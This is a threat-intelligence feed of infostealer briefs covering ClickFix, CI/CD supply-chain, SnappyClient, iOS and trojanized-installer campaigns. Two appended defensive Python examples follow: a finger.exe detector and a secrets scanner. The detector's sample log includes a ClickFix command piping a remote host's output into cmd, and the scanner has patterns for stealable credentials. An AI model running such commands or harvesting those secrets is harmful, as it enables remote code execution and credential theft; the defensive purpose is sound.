{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/infostealer/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Windows","Microsoft 365","Google Workspace"],"_cs_severities":["high"],"_cs_tags":["clickfix","malware","social-engineering","rat","infostealer","castleloader","netsupport"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe BackgroundFix campaign is a social engineering scheme using fake \u0026ldquo;remove your photo background\u0026rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. 
This campaign appears to be active, with multiple domains sharing the same template.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim searches for an online background removal tool and lands on a malicious BackgroundFix site.\u003c/li\u003e\n\u003cli\u003eThe victim uploads an image to the fake website.\u003c/li\u003e\n\u003cli\u003eAfter the victim clicks a checkbox, the site instructs them to copy a command to the clipboard and run it, the usual ClickFix step.\u003c/li\u003e\n\u003cli\u003eThe pasted command runs \u003ccode\u003efinger.exe\u003c/code\u003e, the built-in Windows finger client, to query \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efinger.exe\u003c/code\u003e retrieves a batch script from the C2 server.\u003c/li\u003e\n\u003cli\u003eThe batch script downloads and executes further payloads.\u003c/li\u003e\n\u003cli\u003eCastleLoader is deployed and subsequently drops NetSupport RAT and CastleStealer.\u003c/li\u003e\n\u003cli\u003eNetSupport RAT gives the attacker remote access, while CastleStealer exfiltrates sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack installs NetSupport RAT, giving the attacker remote control of the compromised system. CastleStealer additionally exfiltrates browser credentials, wallet extension data, and Telegram session files. Stolen session files can often be replayed without the victim\u0026rsquo;s password, so this data supports financial fraud, identity theft, and unauthorized access to accounts directly, without a further phishing step. 
The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003efinger.exe\u003c/code\u003e with a command line that references an external host (IOC: \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e). \u003ccode\u003efinger.exe\u003c/code\u003e is a legitimate but rarely used Windows binary, so any execution outside a known administrative use is worth investigating, whatever host it queries.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule in this brief to detect \u003ccode\u003efinger.exe\u003c/code\u003e execution and surface initial access attempts; because the campaign rotates domains, do not depend on the domain IOC alone.\u003c/li\u003e\n\u003cli\u003eBlock the C2 domain \u003ccode\u003echeeshomireciple[.]com\u003c/code\u003e at the DNS resolver and web proxy to prevent initial payload delivery, and consider blocking outbound TCP/79 (the finger protocol) at the perimeter, since it has no legitimate use in most environments.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: \u003ccode\u003eporonto[.]com:688\u003c/code\u003e, \u003ccode\u003egiovettiadv[.]com:688\u003c/code\u003e). NetSupport Manager is legitimate remote administration software, so alert on these C2 hosts and on NetSupport installations that IT did not deploy rather than on the client binary alone.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T13:00:00Z","date_published":"2026-04-30T13:00:00Z","id":"/briefs/2026-04-clickfix-backgroundfix/","summary":"The 'BackgroundFix' ClickFix campaign lures victims to a fake free image-editing site and tricks them into running a clipboard command, leading to the deployment of CastleLoader, NetSupport RAT for remote access, and CastleStealer for credential theft.","title":"ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer","url":"https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","ci/cd","infostealer"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eTeamPCP is conducting a supply chain attack targeting multiple companies through the compromise of their CI/CD pipelines and GitHub accounts. 
The attack uses an infostealer that harvests credentials from CI environments, the contents of .env files, and cloud tokens. The stolen credentials gave the attackers unauthorized access and the ability to inject malicious code into the software development lifecycle. Affected projects include Trivy, KICS, and LiteLLM; Trivy and KICS are themselves security scanners that many organizations run inside their own CI pipelines, so a tampered release would execute with access to those pipelines\u0026rsquo; secrets. Compromised code can be distributed to many downstream users, so the attack poses a significant risk to the integrity of the software supply chain.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of a developer\u0026rsquo;s machine or CI/CD environment via an unspecified initial access vector.\u003c/li\u003e\n\u003cli\u003eDeployment of an infostealer binary onto the compromised system.\u003c/li\u003e\n\u003cli\u003eThe infostealer scans the local file system for .env files, which commonly hold database passwords, API keys, and tokens in plaintext.\u003c/li\u003e\n\u003cli\u003eThe infostealer reads CI/CD environment variables to extract API keys, tokens, and other secrets injected into the build.\u003c/li\u003e\n\u003cli\u003eThe infostealer searches for cloud tokens, potentially targeting AWS credentials, Azure service principals, or GCP service account keys.\u003c/li\u003e\n\u003cli\u003eExtracted credentials are used to gain unauthorized access to GitHub accounts and CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eAttackers inject malicious code or dependencies into the targeted projects, contaminating the supply chain.\u003c/li\u003e\n\u003cli\u003eCompromised code is distributed to downstream users of Trivy, KICS, LiteLLM, and other impacted projects.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe TeamPCP supply chain attack has impacted multiple companies and projects, 
including Trivy, KICS, and LiteLLM. The compromise of CI/CD pipelines and GitHub accounts allows attackers to inject malicious code into software projects, potentially affecting thousands of users. This can lead to data breaches, malware infections, and erosion of trust in the affected software. The exact number of victims is unknown, but the impact is significant because of the widespread use of the compromised projects in the cloud security and development sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRequire phishing-resistant multi-factor authentication (FIDO2 security keys or passkeys) on all GitHub accounts and CI/CD systems. MFA protects the login, not the tokens and session cookies an infostealer lifts from a developer machine; those are replayed without any MFA prompt.\u003c/li\u003e\n\u003cli\u003eReplace long-lived API keys in CI with short-lived credentials where the platform supports it (for example OIDC federation from the CI provider to the cloud account), scope the remaining tokens to least privilege so a stolen token cannot push commits or publish releases, and rotate any long-lived key immediately on suspicion of exposure, not only on a schedule.\u003c/li\u003e\n\u003cli\u003eImplement secrets scanning in CI/CD pipelines to prevent accidental exposure of sensitive information in code repositories and in build logs.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Infostealer Activity in CI/CD Environments\u0026rdquo; to identify suspicious processes accessing environment variables.\u003c/li\u003e\n\u003cli\u003eMonitor file system access for unusual reads of .env files, using the \u0026ldquo;Detect .env File Access\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect anomalous connections originating from CI/CD servers or developer workstations.\u003c/li\u003e\n\u003cli\u003eDownstream consumers of the affected projects should pin to known-good versions and verify release signatures or checksums where the project publishes them.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-teampcp-supply-chain/","summary":"TeamPCP compromised CI/CD pipelines and GitHub accounts of multiple companies by deploying an infostealer to extract credentials from CI environments, .env files, and cloud tokens, impacting projects like Trivy, KICS, and LiteLLM.","title":"TeamPCP Supply Chain Attack via CI/CD 
Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["snappyclient","hijackloader","malware","infostealer","keylogger"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSnappyClient is a multi-function malware family delivered by HijackLoader, a widely used commodity malware loader. Its capabilities include screenshot capture, keylogging, a remote terminal for interactive command execution, and targeted data theft from web browsers, browser extensions, and other applications. Together these point to an operator focused on credential harvesting, data collection, and persistent access through remote command and control. Defenders should prioritize detection and prevention measures to mitigate the risk of SnappyClient infections. 
The initial report of this activity was published in March 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: HijackLoader infects the system (delivery mechanism unspecified).\u003c/li\u003e\n\u003cli\u003ePersistence: HijackLoader establishes persistence to ensure SnappyClient is executed upon system reboot.\u003c/li\u003e\n\u003cli\u003eMalware Deployment: HijackLoader deploys and executes the SnappyClient malware.\u003c/li\u003e\n\u003cli\u003eScreenshot Capture: SnappyClient begins capturing screenshots of the user\u0026rsquo;s desktop activity using built-in OS functions.\u003c/li\u003e\n\u003cli\u003eKeylogging: SnappyClient logs keystrokes to capture sensitive information such as usernames, passwords, and financial details.\u003c/li\u003e\n\u003cli\u003eBrowser Data Theft: SnappyClient targets web browsers and their extensions to steal cookies, saved credentials, and browsing history.\u003c/li\u003e\n\u003cli\u003eRemote Terminal: SnappyClient establishes a remote terminal, granting the attacker interactive command execution capabilities.\u003c/li\u003e\n\u003cli\u003eData Exfiltration: Stolen data is exfiltrated to a command and control server controlled by the attacker.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful SnappyClient infections can result in significant data breaches, including the compromise of sensitive credentials, financial information, and personal data. The remote terminal functionality allows attackers to perform arbitrary actions on compromised systems, potentially leading to further damage or lateral movement within the network. 
While the number of victims and the sectors targeted are unknown, the malware\u0026rsquo;s capabilities make it a high-risk threat to organizations of all sizes.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process-creation logging with full command lines and parent process fields (Sysmon Event ID 1; logsource: process_creation) so the loader-to-payload chain from HijackLoader to SnappyClient is visible.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect and block connections to known HijackLoader command and control infrastructure.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect SnappyClient activity and tune them for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor registry modifications for the persistence mechanisms HijackLoader uses to launch SnappyClient (Sysmon Event ID 13; logsource: registry_set), with attention to Run keys and other autostart locations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:19:06Z","date_published":"2026-03-20T05:19:06Z","id":"/briefs/2024-01-08-snappyclient/","summary":"SnappyClient is a multi-functional malware delivered via HijackLoader that steals data from browsers, takes screenshots, logs keystrokes, and establishes a remote terminal for attacker command and control.","title":"SnappyClient Malware Delivered via HijackLoader","url":"https://feed.craftedsignal.io/briefs/2024-01-08-snappyclient/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["ios","exploit","infostealer","darksword"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA new iOS exploit named \u0026ldquo;DarkSword\u0026rdquo; has been identified as being actively used in infostealer attacks against iPhones. While specific details of the exploit remain limited, its use is a significant threat to iOS users. 
The attackers are leveraging this exploit to potentially bypass security measures and gain unauthorized access to sensitive information stored on targeted devices. The lack of specific details regarding the exploit\u0026rsquo;s technical aspects and targeted iOS versions makes it challenging to implement precise detection and mitigation strategies. However, the active exploitation necessitates immediate attention and proactive measures to safeguard iOS devices from potential compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attack begins with an unknown initial access vector, potentially involving malicious links or app sideloading techniques, leading to the execution of the DarkSword exploit.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploit Execution:\u003c/strong\u003e The DarkSword exploit is executed on the targeted iPhone, leveraging an unspecified vulnerability within the iOS operating system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e Successful exploitation leads to privilege escalation, granting the attacker elevated permissions on the compromised device.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInfostealer Installation:\u003c/strong\u003e The attacker leverages the escalated privileges to install an infostealer payload onto the device.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e The infostealer malware collects sensitive data, including contacts, messages, photos, and potentially credentials stored on the iPhone.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Staging:\u003c/strong\u003e The collected data is staged for exfiltration, potentially compressed and encrypted to evade detection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand and Control (C2) Communication:\u003c/strong\u003e The malware establishes a 
connection with a remote C2 server to receive further instructions and prepare for data exfiltration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The stolen data is exfiltrated from the compromised iPhone to the attacker\u0026rsquo;s C2 server via an encrypted channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation with DarkSword and deployment of the infostealer can have severe consequences for iPhone users. Stolen data can be used for identity theft, financial fraud, or other malicious purposes. Because the targeted iOS versions and the scope of the campaign are unknown, the threat should be treated as high priority by any organization with managed or BYOD iPhones.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eKeep iPhones on the current iOS release and enforce a minimum OS version through MDM; with the vulnerable versions unknown, an up-to-date device is the most reliable general mitigation available.\u003c/li\u003e\n\u003cli\u003eEnable Lockdown Mode for high-risk users such as executives, administrators, and journalists; it reduces the attack surface that link-based iOS exploit chains typically rely on.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections from iOS devices, which may indicate C2 communication (log source: network_connection).\u003c/li\u003e\n\u003cli\u003eImplement a Mobile Threat Defense (MTD) solution capable of detecting and blocking exploit attempts and malicious app installations on iOS devices.\u003c/li\u003e\n\u003cli\u003eEncourage users to avoid sideloading apps from untrusted sources, as this increases the risk of installing malware (awareness training).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below where MDM or MTD telemetry exposes process execution; stock iOS does not ordinarily emit process-creation logs to a SIEM, so the rule applies to those event feeds rather than to the device itself.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T19:08:08Z","date_published":"2026-03-19T19:08:08Z","id":"/briefs/2026-03-darksword-ios-exploit/","summary":"A new exploit dubbed 'DarkSword' is being actively used in infostealer campaigns targeting iPhones, potentially leading to unauthorized data access and device compromise.","title":"DarkSword iOS Exploit Used in Infostealer 
Attack","url":"https://feed.craftedsignal.io/briefs/2026-03-darksword-ios-exploit/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","infostealer","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA supply chain compromise involving the EmEditor text editor led to the distribution of a trojanized installer. Attackers replaced the legitimate EmEditor installer with a malicious version containing an infostealer. This compromised installer was then distributed through trusted or official channels, deceiving users into installing the malware. This incident underscores the importance of verifying software integrity, even when obtained from seemingly reputable sources, and highlights the potential for significant damage when software supply chains are targeted. The goal is to steal sensitive information from victim machines. Defenders should focus on detecting anomalous process execution and network activity following software installations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises the EmEditor software supply chain.\u003c/li\u003e\n\u003cli\u003eA malicious EmEditor installer is created, embedding an infostealer payload.\u003c/li\u003e\n\u003cli\u003eThe trojanized installer is distributed through trusted or official EmEditor distribution channels.\u003c/li\u003e\n\u003cli\u003eUnsuspecting users download and execute the malicious installer on their Windows systems.\u003c/li\u003e\n\u003cli\u003eThe installer executes the infostealer payload in the background.\u003c/li\u003e\n\u003cli\u003eThe infostealer collects sensitive information such as credentials, browser data, and other valuable data.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to a command-and-control server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen 
information for further malicious activities, such as account compromise or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe EmEditor supply chain compromise distributed an infostealer to an unknown number of users. Victims who downloaded and ran the trojanized installer had sensitive information stolen, potentially leading to financial loss, identity theft, and further compromise of their systems and accounts. A compromise of this kind also erodes trust in legitimate software vendors and distribution channels.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eVerify software integrity before installation: confirm that the installer carries a valid Authenticode signature from the expected vendor, not merely any valid signature, and compare its SHA-256 against a value the vendor publishes out of band. If the attacker also controlled the vendor\u0026rsquo;s signing process, the signature check alone will pass, so treat a hash mismatch or an unfamiliar signer as a stop condition and pair the check with the monitoring below (reference: overview).\u003c/li\u003e\n\u003cli\u003eMonitor for unusual child processes, new scheduled tasks or autoruns, and outbound connections in the period immediately after an installer runs, to catch post-installation activity that a legitimate editor install would not produce (reference: attack chain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential infostealer activity and malicious installer execution (reference: rules).\u003c/li\u003e\n\u003cli\u003eTreat any host that installed EmEditor from the affected channel during the compromise window as compromised: reinstall from a verified package, and rotate credentials and browser-saved passwords that were present on that host.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T00:00:00Z","date_published":"2026-03-19T00:00:00Z","id":"/briefs/2026-03-emeditor-supply-chain/","summary":"A trojanized EmEditor installer was distributed through a trusted source, delivering an infostealer, highlighting how attackers exploit legitimate software distribution channels to bypass user trust and security controls.","title":"EmEditor Supply Chain Compromise Delivering Infostealer","url":"https://feed.craftedsignal.io/briefs/2026-03-emeditor-supply-chain/"}],"language":"en","title":"CraftedSignal Threat Feed — Infostealer","version":"https://jsonfeed.org/version/1.1"}
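The process-creation check recommended in the BackgroundFix brief above (finger.exe with an external host on its command line, plus the finger-to-cmd chain that the attack chain describes) as an added example. This is not code from the feed or from any of its briefs; it applies the logic to a few constructed, Sysmon-style Event ID 1 records embedded inline, and it also illustrates the command-line and parent-process fields that the SnappyClient brief asks you to collect. The field names, the sanctioned internal host finger.corp.example, and the sample events are assumptions; the only IOC taken from the brief is cheeshomireciple[.]com.

```python
"""finger.exe ClickFix detection over Sysmon-style process-creation events.

Added example for the BackgroundFix brief; not code from the feed or the
brief. Event field names (Image, CommandLine, ParentImage) follow Sysmon
Event ID 1; the sample events below are constructed for illustration.
"""
import json
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# IOC from the brief, kept defanged in source and refanged for matching.
KNOWN_C2 = {"cheeshomireciple[.]com".replace("[.]", ".")}

# Hosts where finger use is sanctioned. Assumption for illustration: most
# environments have none, in which case leave this set empty.
ALLOWED_FINGER_HOSTS = {"finger.corp.example"}

# finger output piped straight into a command interpreter: the retrieved
# text is executed as a batch script (the LOLBin pattern behind step 5).
PIPE_TO_CMD = re.compile(r"\bfinger(?:\.exe)?\b.*\|\s*(?:cmd|powershell)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    host: Optional[str]
    command_line: str


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hosts_in(cmdline: str) -> Set[str]:
    """Hosts a finger command line will query (finger takes 'host' or 'user@host')."""
    hosts = set()
    for tok in cmdline.replace("|", " | ").split():
        tok = tok.strip("\"'").lower()
        if tok in {"|", "cmd", "finger"} or tok.startswith(("-", "/")) or tok.endswith(".exe"):
            continue
        host = tok.rsplit("@", 1)[-1]
        if "." in host and not host.startswith("."):
            hosts.add(host)
    return hosts


def check_event(ev: dict) -> List[Finding]:
    """Apply the finger.exe rules to one process-creation event."""
    findings: List[Finding] = []
    img = image_name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    parent = image_name(ev.get("ParentImage", ""))

    if img == "finger.exe":
        hosts = hosts_in(cmd)
        c2 = hosts & KNOWN_C2
        external = hosts - ALLOWED_FINGER_HOSTS
        if c2:
            findings.append(Finding("finger_known_c2", sorted(c2)[0], cmd))
        elif external:
            findings.append(Finding("finger_external_host", sorted(external)[0], cmd))
        elif not hosts:
            # No recognisable host argument; still rare enough to record.
            findings.append(Finding("finger_exec", None, cmd))
    elif img in {"cmd.exe", "powershell.exe"} and PIPE_TO_CMD.search(cmd):
        findings.append(Finding("finger_pipe_to_cmd", None, cmd))

    if parent == "finger.exe":
        # finger.exe never needs to spawn anything.
        findings.append(Finding("child_of_finger", None, cmd))
    return findings


def scan(events) -> List[Finding]:
    out: List[Finding] = []
    for ev in events:
        out.extend(check_event(ev))
    return out


# Constructed sample log (JSON lines), not real telemetry: one sanctioned
# finger use, the ClickFix Run-dialog command and its finger.exe child,
# and an unrelated process.
SAMPLE_LOG = r"""
{"Image": "C:\\Windows\\System32\\finger.exe", "CommandLine": "finger ops@finger.corp.example", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c finger user@cheeshomireciple.com | cmd", "ParentImage": "C:\\Windows\\explorer.exe"}
{"Image": "C:\\Windows\\System32\\finger.exe", "CommandLine": "finger user@cheeshomireciple.com", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt", "ParentImage": "C:\\Windows\\explorer.exe"}
"""
SAMPLE_EVENTS = [json.loads(line) for line in SAMPLE_LOG.strip().splitlines()]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:22} host={f.host} cmd={f.command_line}")
```

The domain IOC is the weakest of the four rules: the brief notes that the campaign rotates domains, so the host-agnostic rules (finger_external_host, finger_pipe_to_cmd, child_of_finger) are the ones worth keeping once the listed domain goes stale.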
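The secrets scanning step in the TeamPCP recommendations above, as an added example that is not code from the feed, the brief, or any of the affected projects: a small scanner that classifies the kind of material an infostealer would find in a .env file or in CI environment variables, run over a constructed .env and a constructed environment mapping embedded inline. The detectors cover AWS access key IDs, GitHub tokens, credentials embedded in URLs, private key blocks, and high-entropy values under secret-looking names; the patterns, the entropy threshold, and the sample values (documented placeholder keys and made-up strings, not live credentials) are assumptions.

```python
"""Secrets scanning for .env content and CI environment variables.

Added example for the TeamPCP brief; not code from the feed, the brief or
any affected project. Patterns and thresholds are illustrative; the
sample values are placeholders constructed for this example.
"""
import math
import re
from collections import Counter
from typing import Dict, List, NamedTuple

SECRET_NAME = re.compile(r"(SECRET|TOKEN|PASSWORD|PASSWD|API_?KEY|PRIVATE_KEY)", re.IGNORECASE)
# Pattern-based detectors, checked first because they are high confidence.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "url_credentials": re.compile(r"://[^/:@\s]+:[^@\s]+@"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}
ENTROPY_BITS = 3.5   # assumption: random keys score above this, words below
MIN_LEN = 16


class Finding(NamedTuple):
    source: str
    name: str
    kind: str
    preview: str


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from character frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def classify(name: str, value: str) -> str:
    """Return the kind of secret a value looks like, or '' if it looks benign."""
    for kind, rx in PATTERNS.items():
        if rx.search(value):
            return kind
    if SECRET_NAME.search(name) and len(value) >= MIN_LEN and shannon_entropy(value) > ENTROPY_BITS:
        return "high_entropy_secret"
    return ""


def preview(value: str) -> str:
    """Mask a value so findings can be logged without re-exposing the secret."""
    return value[:4] + "..." if len(value) > 8 else "***"


def parse_dotenv(text: str) -> Dict[str, str]:
    """Minimal .env parser: KEY=VALUE lines, optional 'export', quotes, comments."""
    out: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, val = line.partition("=")
        val = val.strip()
        if len(val) >= 2 and val[0] == val[-1] and val[0] in "\"'":
            val = val[1:-1]
        out[key.strip()] = val
    return out


def scan_mapping(source: str, mapping: Dict[str, str]) -> List[Finding]:
    """Scan name/value pairs (a parsed .env or os.environ) for secrets."""
    return [
        Finding(source, k, kind, preview(v))
        for k, v in mapping.items()
        if (kind := classify(k, v))
    ]


# Constructed sample inputs. Key values are documented placeholders or
# made-up strings, never live credentials.
SAMPLE_DOTENV = """
# local dev settings
DATABASE_URL=postgres://app:hunter2@db.internal:5432/app
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
GITHUB_TOKEN=ghp_0123456789abcdefghijklmnopqrstuvwxyz
DEBUG=true
"""
SAMPLE_CI_ENV = {
    "CI": "true",
    "GITHUB_REF": "refs/heads/main",
    "NPM_TOKEN": "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6",
}


def scan_all() -> List[Finding]:
    return scan_mapping(".env", parse_dotenv(SAMPLE_DOTENV)) + scan_mapping("ci_env", SAMPLE_CI_ENV)


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f.source:7} {f.name:22} {f.kind:20} {f.preview}")
```

Every finding this produces is a value the infostealer in the brief would have collected with a single file read or environment dump, which is the point of running the scan before the secret ever lands in a .env file or a build environment: the remediation is to move each one to a short-lived or scoped credential, not just to stop committing it.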